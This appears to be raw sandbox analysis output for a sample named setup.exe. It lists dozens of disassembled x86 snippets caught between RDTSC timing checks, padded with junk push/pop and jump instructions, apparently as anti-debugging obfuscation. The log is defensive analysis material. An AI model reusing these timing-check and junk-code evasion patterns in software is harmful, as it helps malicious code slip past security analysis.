Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4B808C7 second address: 4B80935 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FEA5CDC3A1Fh 0x00000009 xor cl, 0000006Eh 0x0000000c jmp 00007FEA5CDC3A29h 0x00000011 popfd 0x00000012 jmp 00007FEA5CDC3A20h 0x00000017 popad 0x00000018 pop edx 0x00000019 pop eax 0x0000001a mov dword ptr [esp], ebp 0x0000001d pushad 0x0000001e pushad 0x0000001f pushfd 0x00000020 jmp 00007FEA5CDC3A1Ch 0x00000025 adc cl, 00000018h 0x00000028 jmp 00007FEA5CDC3A1Bh 0x0000002d popfd 0x0000002e push ecx 0x0000002f pop edx 0x00000030 popad 0x00000031 push eax 0x00000032 push edx 0x00000033 mov ecx, 76DE8BE1h 0x00000038 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4B80935 second address: 4B80954 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov ebp, esp 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c movsx edi, ax 0x0000000f call 00007FEA5C6FB9EEh 0x00000014 pop eax 0x00000015 popad 0x00000016 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4B80954 second address: 4B80959 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4B50D17 second address: 4B50D1B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4B50D1B second address: 4B50D21 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4B50D21 second address: 4B50D27 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4B50EF6 second address: 4B50EFC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4B50EFC second address: 4B50F25 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEA5C6FB9EBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebp 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FEA5C6FB9F5h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4B50F25 second address: 4B50F79 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEA5CDC3A21h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jmp 00007FEA5CDC3A21h 0x0000000f xchg eax, ebp 0x00000010 pushad 0x00000011 mov cl, 25h 0x00000013 mov si, bx 0x00000016 popad 0x00000017 mov ebp, esp 0x00000019 jmp 00007FEA5CDC3A1Bh 0x0000001e pop ebp 0x0000001f push eax 0x00000020 push edx 0x00000021 jmp 00007FEA5CDC3A25h 0x00000026 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4B50F79 second address: 4B50F89 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FEA5C6FB9ECh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4B50F89 second address: 4B50F8D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4B80008 second address: 4B8000E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4B8000E second address: 4B8008C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FEA5CDC3A1Fh 0x00000009 adc cl, FFFFFF9Eh 0x0000000c jmp 00007FEA5CDC3A29h 0x00000011 popfd 0x00000012 push ecx 0x00000013 pop ebx 0x00000014 popad 0x00000015 pop edx 0x00000016 pop eax 0x00000017 xchg eax, ebp 0x00000018 jmp 00007FEA5CDC3A1Ah 0x0000001d push eax 0x0000001e jmp 00007FEA5CDC3A1Bh 0x00000023 xchg eax, ebp 0x00000024 jmp 00007FEA5CDC3A26h 0x00000029 mov ebp, esp 0x0000002b push eax 0x0000002c push edx 0x0000002d jmp 00007FEA5CDC3A27h 0x00000032 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4B8008C second address: 4B80092 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4B80092 second address: 4B80096 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4B80096 second address: 4B80147 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jmp 00007FEA5C6FB9ECh 0x0000000e mov dword ptr [esp], ecx 0x00000011 jmp 00007FEA5C6FB9F0h 0x00000016 mov eax, dword ptr [76FB65FCh] 0x0000001b pushad 0x0000001c mov ebx, esi 0x0000001e jmp 00007FEA5C6FB9EAh 0x00000023 popad 0x00000024 test eax, eax 0x00000026 pushad 0x00000027 push ecx 0x00000028 pushfd 0x00000029 jmp 00007FEA5C6FB9EDh 0x0000002e and eax, 7BA09556h 0x00000034 jmp 00007FEA5C6FB9F1h 0x00000039 popfd 0x0000003a pop ecx 0x0000003b mov al, bh 0x0000003d popad 0x0000003e je 00007FEACEAAF24Dh 0x00000044 pushad 0x00000045 push eax 0x00000046 mov si, dx 0x00000049 pop edx 0x0000004a push esi 0x0000004b mov edx, 52DF6D90h 0x00000050 pop edi 0x00000051 popad 0x00000052 mov ecx, eax 0x00000054 pushad 0x00000055 mov di, si 0x00000058 push eax 0x00000059 call 00007FEA5C6FB9EDh 0x0000005e pop ecx 0x0000005f pop ebx 0x00000060 popad 0x00000061 xor eax, dword ptr [ebp+08h] 0x00000064 push eax 0x00000065 push edx 0x00000066 jmp 00007FEA5C6FB9F8h 0x0000006b rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4B80147 second address: 4B8014D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4B8014D second address: 4B80151 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4B80151 second address: 4B80185 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEA5CDC3A1Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b and ecx, 1Fh 0x0000000e jmp 00007FEA5CDC3A1Eh 0x00000013 ror eax, cl 0x00000015 push eax 0x00000016 push edx 0x00000017 push eax 0x00000018 push edx 0x00000019 jmp 00007FEA5CDC3A1Ah 0x0000001e rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4B80185 second address: 4B80194 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEA5C6FB9EBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4B80194 second address: 4B8019A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4B8019A second address: 4B801EF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEA5C6FB9EBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b leave 0x0000000c jmp 00007FEA5C6FB9F6h 0x00000011 retn 0004h 0x00000014 nop 0x00000015 mov esi, eax 0x00000017 lea eax, dword ptr [ebp-08h] 0x0000001a xor esi, dword ptr [00382014h] 0x00000020 push eax 0x00000021 push eax 0x00000022 push eax 0x00000023 lea eax, dword ptr [ebp-10h] 0x00000026 push eax 0x00000027 call 00007FEA60F3BBBBh 0x0000002c push FFFFFFFEh 0x0000002e pushad 0x0000002f mov dx, ax 0x00000032 mov dl, cl 0x00000034 popad 0x00000035 pop eax 0x00000036 jmp 00007FEA5C6FB9F5h 0x0000003b ret 0x0000003c nop 0x0000003d push eax 0x0000003e call 00007FEA60F3BBD4h 0x00000043 mov edi, edi 0x00000045 pushad 0x00000046 push eax 0x00000047 push edx 0x00000048 mov esi, 04BA8FC9h 0x0000004d rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4B801EF second address: 4B8025F instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007FEA5CDC3A26h 0x00000008 add cx, D018h 0x0000000d jmp 00007FEA5CDC3A1Bh 0x00000012 popfd 0x00000013 pop edx 0x00000014 pop eax 0x00000015 pushfd 0x00000016 jmp 00007FEA5CDC3A28h 0x0000001b sub ecx, 34EB3A78h 0x00000021 jmp 00007FEA5CDC3A1Bh 0x00000026 popfd 0x00000027 popad 0x00000028 xchg eax, ebp 0x00000029 push eax 0x0000002a push edx 0x0000002b jmp 00007FEA5CDC3A25h 0x00000030 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4B8025F second address: 4B80265 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4B80265 second address: 4B80269 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4B80269 second address: 4B80320 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a call 00007FEA5C6FB9F4h 0x0000000f jmp 00007FEA5C6FB9F2h 0x00000014 pop eax 0x00000015 pushfd 0x00000016 jmp 00007FEA5C6FB9EBh 0x0000001b xor eax, 39F7D4FEh 0x00000021 jmp 00007FEA5C6FB9F9h 0x00000026 popfd 0x00000027 popad 0x00000028 xchg eax, ebp 0x00000029 jmp 00007FEA5C6FB9EEh 0x0000002e mov ebp, esp 0x00000030 pushad 0x00000031 call 00007FEA5C6FB9EEh 0x00000036 movzx ecx, bx 0x00000039 pop edx 0x0000003a pushfd 0x0000003b jmp 00007FEA5C6FB9ECh 0x00000040 add ah, 00000058h 0x00000043 jmp 00007FEA5C6FB9EBh 0x00000048 popfd 0x00000049 popad 0x0000004a pop ebp 0x0000004b push eax 0x0000004c push edx 0x0000004d jmp 00007FEA5C6FB9F5h 0x00000052 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4B30012 second address: 4B3008E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FEA5CDC3A23h 0x00000009 popad 0x0000000a push eax 0x0000000b pushad 0x0000000c push edx 0x0000000d pushfd 0x0000000e jmp 00007FEA5CDC3A22h 0x00000013 and si, 42B8h 0x00000018 jmp 00007FEA5CDC3A1Bh 0x0000001d popfd 0x0000001e pop esi 0x0000001f mov ax, dx 0x00000022 popad 0x00000023 xchg eax, ebp 0x00000024 pushad 0x00000025 push eax 0x00000026 push edx 0x00000027 pushfd 0x00000028 jmp 00007FEA5CDC3A23h 0x0000002d sbb eax, 3EFA392Eh 0x00000033 jmp 00007FEA5CDC3A29h 0x00000038 popfd 0x00000039 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4B3008E second address: 4B300D3 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov ebp, esp 0x00000009 pushad 0x0000000a pushfd 0x0000000b jmp 00007FEA5C6FB9F8h 0x00000010 jmp 00007FEA5C6FB9F5h 0x00000015 popfd 0x00000016 mov ch, 92h 0x00000018 popad 0x00000019 and esp, FFFFFFF8h 0x0000001c push eax 0x0000001d push edx 0x0000001e push eax 0x0000001f push edx 0x00000020 push eax 0x00000021 push edx 0x00000022 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4B300D3 second address: 4B300D7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4B300D7 second address: 4B300DB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4B300DB second address: 4B300E1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4B300E1 second address: 4B300E7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4B300E7 second address: 4B300EB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4B301A7 second address: 4B301BA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FEA5C6FB9EFh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4B301BA second address: 4B30210 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, esi 0x00000009 jmp 00007FEA5CDC3A25h 0x0000000e mov esi, dword ptr [ebp+08h] 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 mov esi, ebx 0x00000016 pushfd 0x00000017 jmp 00007FEA5CDC3A1Fh 0x0000001c or ax, 6F9Eh 0x00000021 jmp 00007FEA5CDC3A29h 0x00000026 popfd 0x00000027 popad 0x00000028 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4B30210 second address: 4B30266 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov bl, AFh 0x00000005 pushad 0x00000006 popad 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a xchg eax, edi 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e pushfd 0x0000000f jmp 00007FEA5C6FB9F1h 0x00000014 sub cl, FFFFFF86h 0x00000017 jmp 00007FEA5C6FB9F1h 0x0000001c popfd 0x0000001d pushfd 0x0000001e jmp 00007FEA5C6FB9F0h 0x00000023 sub cl, 00000028h 0x00000026 jmp 00007FEA5C6FB9EBh 0x0000002b popfd 0x0000002c popad 0x0000002d rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4B30266 second address: 4B302A6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 mov ax, di 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c jmp 00007FEA5CDC3A1Eh 0x00000011 xchg eax, edi 0x00000012 pushad 0x00000013 pushfd 0x00000014 jmp 00007FEA5CDC3A1Eh 0x00000019 and si, 68B8h 0x0000001e jmp 00007FEA5CDC3A1Bh 0x00000023 popfd 0x00000024 push eax 0x00000025 push edx 0x00000026 mov edx, esi 0x00000028 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4B302A6 second address: 4B302F2 instructions: 0x00000000 rdtsc 0x00000002 mov eax, 27348601h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a test esi, esi 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f jmp 00007FEA5C6FB9F9h 0x00000014 pushfd 0x00000015 jmp 00007FEA5C6FB9F0h 0x0000001a or ecx, 291A8D78h 0x00000020 jmp 00007FEA5C6FB9EBh 0x00000025 popfd 0x00000026 popad 0x00000027 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4B302F2 second address: 4B30324 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEA5CDC3A29h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 je 00007FEACF1C1D1Ch 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007FEA5CDC3A1Dh 0x00000016 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4B30324 second address: 4B30346 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEA5C6FB9F1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 cmp dword ptr [esi+08h], DDEEDDEEh 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 pushad 0x00000015 popad 0x00000016 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4B30346 second address: 4B3034C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4B3034C second address: 4B30381 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ecx 0x00000004 pop edx 0x00000005 mov al, 5Ah 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a je 00007FEACEAF9CBBh 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 mov ebx, eax 0x00000015 pushfd 0x00000016 jmp 00007FEA5C6FB9ECh 0x0000001b or esi, 09AB2BC8h 0x00000021 jmp 00007FEA5C6FB9EBh 0x00000026 popfd 0x00000027 popad 0x00000028 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4B30381 second address: 4B303A7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEA5CDC3A29h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov edx, dword ptr [esi+44h] 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4B303A7 second address: 4B303AD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4B303AD second address: 4B30419 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEA5CDC3A22h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 or edx, dword ptr [ebp+0Ch] 0x0000000c pushad 0x0000000d mov dx, si 0x00000010 mov bx, cx 0x00000013 popad 0x00000014 test edx, 61000000h 0x0000001a jmp 00007FEA5CDC3A24h 0x0000001f jne 00007FEACF1C1CB6h 0x00000025 push eax 0x00000026 push edx 0x00000027 pushad 0x00000028 pushfd 0x00000029 jmp 00007FEA5CDC3A1Dh 0x0000002e add si, B656h 0x00000033 jmp 00007FEA5CDC3A21h 0x00000038 popfd 0x00000039 pushad 0x0000003a popad 0x0000003b popad 0x0000003c rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4B30419 second address: 4B3044C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEA5C6FB9F7h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 test byte ptr [esi+48h], 00000001h 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007FEA5C6FB9F0h 0x00000016 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4B3044C second address: 4B30450 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4B30450 second address: 4B30456 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4B20942 second address: 4B2097C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEA5CDC3A28h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b pushad 0x0000000c movzx eax, dx 0x0000000f mov dx, 3A8Eh 0x00000013 popad 0x00000014 and esp, FFFFFFF8h 0x00000017 push eax 0x00000018 push edx 0x00000019 pushad 0x0000001a mov ebx, eax 0x0000001c jmp 00007FEA5CDC3A1Ah 0x00000021 popad 0x00000022 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4B2097C second address: 4B2098E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FEA5C6FB9EEh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4B2098E second address: 4B209C1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEA5CDC3A1Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebx 0x0000000c jmp 00007FEA5CDC3A26h 0x00000011 push eax 0x00000012 push eax 0x00000013 push edx 0x00000014 pushad 0x00000015 mov si, A003h 0x00000019 pushad 0x0000001a popad 0x0000001b popad 0x0000001c rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4B209C1 second address: 4B20A11 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 pop ebx 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ebx 0x00000009 jmp 00007FEA5C6FB9EAh 0x0000000e xchg eax, esi 0x0000000f jmp 00007FEA5C6FB9F0h 0x00000014 push eax 0x00000015 jmp 00007FEA5C6FB9EBh 0x0000001a xchg eax, esi 0x0000001b jmp 00007FEA5C6FB9F6h 0x00000020 mov esi, dword ptr [ebp+08h] 0x00000023 push eax 0x00000024 push edx 0x00000025 push eax 0x00000026 push edx 0x00000027 pushad 0x00000028 popad 0x00000029 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4B20A11 second address: 4B20A2E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEA5CDC3A29h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4B20A2E second address: 4B20AA1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FEA5C6FB9F7h 0x00000009 adc esi, 3423F37Eh 0x0000000f jmp 00007FEA5C6FB9F9h 0x00000014 popfd 0x00000015 pushfd 0x00000016 jmp 00007FEA5C6FB9F0h 0x0000001b jmp 00007FEA5C6FB9F5h 0x00000020 popfd 0x00000021 popad 0x00000022 pop edx 0x00000023 pop eax 0x00000024 sub ebx, ebx 0x00000026 push eax 0x00000027 push edx 0x00000028 jmp 00007FEA5C6FB9EAh 0x0000002d rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4B20AA1 second address: 4B20AA7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4B20AA7 second address: 4B20AB7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 test esi, esi 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4B20AB7 second address: 4B20AC9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEA5CDC3A1Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4B20AC9 second address: 4B20B51 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movsx ebx, cx 0x00000006 jmp 00007FEA5C6FB9EAh 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e je 00007FEACEB01298h 0x00000014 jmp 00007FEA5C6FB9F0h 0x00000019 cmp dword ptr [esi+08h], DDEEDDEEh 0x00000020 jmp 00007FEA5C6FB9F0h 0x00000025 mov ecx, esi 0x00000027 jmp 00007FEA5C6FB9F0h 0x0000002c je 00007FEACEB0126Eh 0x00000032 jmp 00007FEA5C6FB9F0h 0x00000037 test byte ptr [76FB6968h], 00000002h 0x0000003e push eax 0x0000003f push edx 0x00000040 jmp 00007FEA5C6FB9F7h 0x00000045 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4B20B51 second address: 4B20B7A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov dl, 4Dh 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jne 00007FEACF1C9273h 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007FEA5CDC3A29h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4B20B7A second address: 4B20BB1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEA5C6FB9F1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov edx, dword ptr [ebp+0Ch] 0x0000000c pushad 0x0000000d mov esi, 3CB4DE73h 0x00000012 mov ax, EECFh 0x00000016 popad 0x00000017 xchg eax, ebx 0x00000018 push eax 0x00000019 push edx 0x0000001a jmp 00007FEA5C6FB9F1h 0x0000001f rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4B20BB1 second address: 4B20BCD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov edx, 0A809242h 0x00000008 mov si, di 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007FEA5CDC3A1Bh 0x00000016 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4B20BCD second address: 4B20BF4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEA5C6FB9F9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebx 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d mov bx, 2E9Eh 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4B20BF4 second address: 4B20BF9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4B20BF9 second address: 4B20C39 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ch, 4Dh 0x00000005 mov ax, di 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push ebx 0x0000000c pushad 0x0000000d pushfd 0x0000000e jmp 00007FEA5C6FB9F2h 0x00000013 adc ax, 2098h 0x00000018 jmp 00007FEA5C6FB9EBh 0x0000001d popfd 0x0000001e push eax 0x0000001f movsx edi, si 0x00000022 pop eax 0x00000023 popad 0x00000024 mov dword ptr [esp], ebx 0x00000027 push eax 0x00000028 push edx 0x00000029 push eax 0x0000002a push edx 0x0000002b pushad 0x0000002c popad 0x0000002d rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4B20C39 second address: 4B20C3F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
